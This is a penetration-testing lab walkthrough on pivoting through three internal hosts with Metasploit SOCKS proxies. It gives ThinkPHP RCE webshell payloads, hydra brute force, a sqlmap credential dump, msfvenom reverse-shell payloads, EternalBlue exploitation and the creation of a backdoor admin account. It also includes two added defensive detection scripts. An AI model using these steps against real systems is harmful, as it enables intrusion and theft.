SOCKS Proxy in Practice (MSF)

Penetration Scenario


Testing Target1

Target1 environment information

OS: CentOS7_64
Bridged NIC: VMnet0 10.63.165.242
Host-only NIC: VMnet2 192.168.22.11
root password: (a single space)
BT Panel (宝塔) admin login address and password:
Address: http://10.63.165.242:8888/
Account: eaj3yhsl
Password: 41bb8fee

Information Gathering

  • Port enumeration

nmap -A -T4 -p- --script vuln 10.63.165.242

Open ports: 21/22/80/111/888/3306/8888
OS: Linux

Analysis and Exploitation

  • Ports 21 / 22

Weak-password brute force

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 10.63.165.242 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 10.63.165.242 ssh

  • Port 3306

Remote IP connections are not allowed

  • Port 80

ThinkPHP v5.0 has a remote command execution vulnerability; using the command execution to write a one-line webshell gives a shell (GetShell)

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell1.php&vars[1][]=<?php @eval($_POST[c]);?>

Webshell address: http://10.63.165.242/shell.php

Password: c
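From the defender's side, the three requests above all share the ThinkPHP 5 `invokefunction` + `call_user_func_array` signature, and the webshell drop is visible as `file_put_contents` writing a `.php` file. The following is an added example (Python, not part of the original write-up) that flags such requests in a web access log; the log lines are constructed for this example and the severity labels are an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (combined-log style) for this example.
SAMPLE_LOG = r"""
10.63.174.25 - - [11/Sep/2023:09:46:44 +0800] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 512
10.63.174.25 - - [11/Sep/2023:09:47:00 +0800] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami HTTP/1.1" 200 64
10.63.174.25 - - [11/Sep/2023:09:47:05 +0800] "GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell1.php&vars[1][]=%3C%3Fphp%20@eval($_POST[c]);%3F%3E HTTP/1.1" 200 0
10.63.165.1 - - [11/Sep/2023:09:48:10 +0800] "GET /index.php?s=index/blog/list&page=2 HTTP/1.1" 200 2048
"""

# Combined log format: client ip, ident, user, [time], "METHOD url HTTP/x"
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) HTTP/')
# Functions whose invocation through call_user_func_array means command or code execution
DANGEROUS = {"system", "exec", "shell_exec", "passthru", "assert", "file_put_contents"}

def classify(url):
    """Return a finding for a ThinkPHP 5 invokefunction RCE attempt, else None."""
    low = unquote_plus(url).lower()          # normalise %5C, %5B, %20 etc.
    if "invokefunction" not in low or "call_user_func_array" not in low:
        return None
    m = re.search(r"vars\[0\]=([a-z0-9_]+)", low)
    func = m.group(1) if m else "unknown"
    # file_put_contents with a .php argument is a webshell drop (third request above)
    webshell_write = (func == "file_put_contents"
                      and re.search(r"vars\[1\]\[\]=[^&]*\.php", low) is not None)
    if webshell_write:
        severity = "critical"
    elif func in DANGEROUS:
        severity = "high"
    else:
        severity = "medium"               # e.g. phpinfo: reconnaissance, still an RCE probe
    return {"function": func, "webshell_write": webshell_write, "severity": severity}

def scan_log(text):
    """Parse access-log lines and return the RCE findings with source ip and time."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        finding = classify(m.group("url"))
        if finding:
            finding.update(ip=m.group("ip"), time=m.group("ts"), method=m.group("method"))
            findings.append(finding)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```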


Host information gathering

ifconfig
# Finds an internal subnet 192.168.22.0/24.

Probe this subnet for live hosts: live host 192.168.22.22 found

You can run a ping-sweep script for this

  • ping.sh

#!/bin/bash
# Ping-sweep 192.168.22.0/24 and report each address as ok or fail
for num in {1..254}; do
    ip="192.168.22.$num"
    # one echo request, 1 s timeout, output discarded
    if ping -c1 -W1 "$ip" >/dev/null 2>&1; then
        echo "$ip ok"
    else
        echo "$ip fail"
    fi
done

chmod 777 ping.sh
./ping.sh > ping.txt

  • LadonGo

https://github.com/k8gege/LadonGo

./Ladon64.lnx 192.168.22.0/24 OnlinePC > 1

  • kscan

https://github.com/lcvvvv/kscan

  • fscan

https://github.com/shadow1ng/fscan

fscan_amd64 -h 192.168.22.0/24

Reverse Shell

Get a reverse shell from Target1 back to MSF

  • Generate the payload with msfvenom

# Generate a PHP script payload

msfvenom -p php/meterpreter/reverse_tcp lhost=10.63.174.25 lport=6666 R -o kc1.php

# Generate a Linux ELF executable

msfvenom -p linux/x64/meterpreter_reverse_tcp lhost=192.168.0.132 lport=6667 -f elf -o kc1.elf

  • Upload to Target1's /tmp directory and execute

# Grant execute permission

chmod 777 kc.elf

# Run the program

./kc.elf

Establishing the SOCKS Proxy

  • After obtaining Target1's meterpreter shell, add a route to the 192.168.22.0/24 subnet

run autoroute -s 192.168.22.0/24
run autoroute -p

  • Start the SOCKS proxy service with MSF's socks_proxy module (SOCKS5)

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > run

  • Configure the proxychains proxy tool

vim /etc/proxychains.conf

socks5 127.0.0.1 1080

Testing Target2

Target2 environment information

OS: Ubuntu16.04_64
Host-only NIC: VMnet3 192.168.22.22
Host-only NIC: VMnet4 192.168.33.22
root password: root
BT Panel (宝塔) admin login address and password:
Address: http://192.168.22.22:8888/2cc52ec0/
Account: xdynr37d
Password: 123qwe..

Information Gathering

Port scan

proxychains nmap -sT -Pn -p- -n -T4 192.168.22.22
Open ports: 21/22/80/3306/8888
OS: linux
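Because the SOCKS proxy relays every connection of the `proxychains nmap -sT -p-` scan above through Target1's meterpreter session, the scan reaches 192.168.22.22 as full TCP connects sourced from Target1's host-only address 192.168.22.11, with each closed port refused rather than left half-open. The following is an added example (Python, not part of the original write-up) that flags this fan-out in connection records from the 192.168.22.0/24 segment; the records are constructed, and the Zeek-style `conn_state` values SF (completed) and REJ (refused) are assumed.

```python
from collections import defaultdict

def constructed_records():
    """Constructed sample (not a real capture): the pivot host 192.168.22.11 touches
    ports 1..120 on 192.168.22.22 within ~2.4 s; 21/22/80 complete (SF), the rest
    are refused (REJ). A second host 192.168.22.5 only ever talks to port 80."""
    recs = []
    base = 1694422212.0
    open_ports = {21, 22, 80}
    for i, port in enumerate(range(1, 121)):
        state = "SF" if port in open_ports else "REJ"
        recs.append((base + i * 0.02, "192.168.22.11", "192.168.22.22", port, state))
    for k in range(5):
        recs.append((base + 10 * k, "192.168.22.5", "192.168.22.22", 80, "SF"))
    return recs

def detect_fanout(records, min_ports=50, window_s=60):
    """Flag (src, dst) pairs where one source reaches >= min_ports distinct
    destination ports within any window_s seconds. Each record is
    (ts, orig_h, resp_h, resp_p, conn_state). A SOCKS-relayed connect scan
    shows up as completed (SF) or refused (REJ) connections, never half-open S0."""
    by_pair = defaultdict(list)
    for ts, orig, resp, port, state in records:
        by_pair[(orig, resp)].append((ts, port, state))
    alerts = []
    for (orig, resp), evs in by_pair.items():
        evs.sort()
        best, i = set(), 0
        for j in range(len(evs)):          # sliding time window over evs[i..j]
            while evs[j][0] - evs[i][0] > window_s:
                i += 1
            ports = {p for _, p, _ in evs[i:j + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            refused = sum(1 for _, _, s in evs if s == "REJ")
            alerts.append({"src": orig, "dst": resp,
                           "distinct_ports": len(best), "refused": refused})
    return alerts

if __name__ == "__main__":
    for a in detect_fanout(constructed_records()):
        print(a)
```

A high refused count from an internal host that normally has no business with the scanned host is the pivot's fingerprint; the attacker's own 10.63.x address never appears in this segment.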


Analysis and Exploitation

  • Ports 21 / 22 / 3306

Weak-password brute force

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ftp

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 ssh

proxychains hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.22.22 mysql

  • Port 8888

BT Panel page, not exploitable

  • Port 80

bagecms, SQL injection

proxychains3 sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword

proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword --dbs

[*] bagecms
[*] information_schema
[*] test

proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms --tables

proxychains sqlmap -u 'http://192.168.22.22/index.php?r=vul&keyword=1' -p keyword -D bagecms -T bage_admin --dump

Backend login credentials obtained: admin/123qwe

Backend login address: http://192.168.22.22/index.php?r=admini/public/login

Backend arbitrary file modification GetShell

Log into the backend -> Templates -> append a one-line webshell to the index.php file -> connect with Cknife configured to use the SOCKS proxy

Webshell address: http://192.168.22.22/index.php

SOCKS Proxy Configuration

  • AntSword (蚁剑) configured with the SOCKS proxy to connect to the webshell

  • Cknife SOCKS proxy settings

Host information gathering

ifconfig
# Finds an internal subnet 192.168.33.0/24.

Probe this subnet for live hosts: live host 192.168.33.33 found

Reverse Shell

Get a shell from Target2 back to MSF

  • Generate a Linux trojan payload with msfvenom

msfvenom -p linux/x64/meterpreter/bind_tcp lport=5555 -f elf > kc23.elf

  • Upload to Target2's /tmp directory and execute

chmod 777 kc23.elf
./kc23.elf

  • Create a bind handler and establish the forward (bind) connection

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.22
set lport 5555
run

Adding the Route

  • Once Target2's meterpreter shell is back, add a route to the 33 subnet:

run autoroute -s 192.168.33.0/24
run autoroute -p

Testing Target3

Target3 environment information

OS: Windows7_64
Host-only NIC: VMnet4 192.168.33.33
Administrator password: root

Information Gathering

proxychains3 nmap -sT -Pn -p- -n -T4 192.168.33.33
Open ports: 135/139/445/3389
OS: Windows

Analysis and Exploitation

  • Port 445

Check for MS17-010

use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.33.33
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.33.33:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.33.33:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Exploit MS17-010

use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.33.33
msf5 exploit(windows/smb/ms17_010_psexec) > set payload windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LPORT 4445
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 192.168.33.33:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[*] 192.168.33.33:445 - Built a write-what-where primitive...
[+] 192.168.33.33:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.33.33:445 - Selecting PowerShell target
[*] 192.168.33.33:445 - Executing the payload...
[+] 192.168.33.33:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 192.168.33.33:4445
[*] Sending stage (201283 bytes) to 192.168.33.33
[*] Meterpreter session 3 opened (192.168.33.22:54748 -> 192.168.33.33:4445) at 2020-06-29 03:53:34 -0400
meterpreter > shell
Process 944 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>
  • Port 3389

Remote desktop connection

# Add an administrator user
net user test test123 /add
net localgroup administrators test /add

# List administrator users
net localgroup administrators

On Windows, use Proxifier to proxy the RDP remote desktop connection

On Linux, use proxychains to proxy rdesktop for a remote connection to the Windows desktop

proxychains rdesktop -u test -p test123 192.168.33.33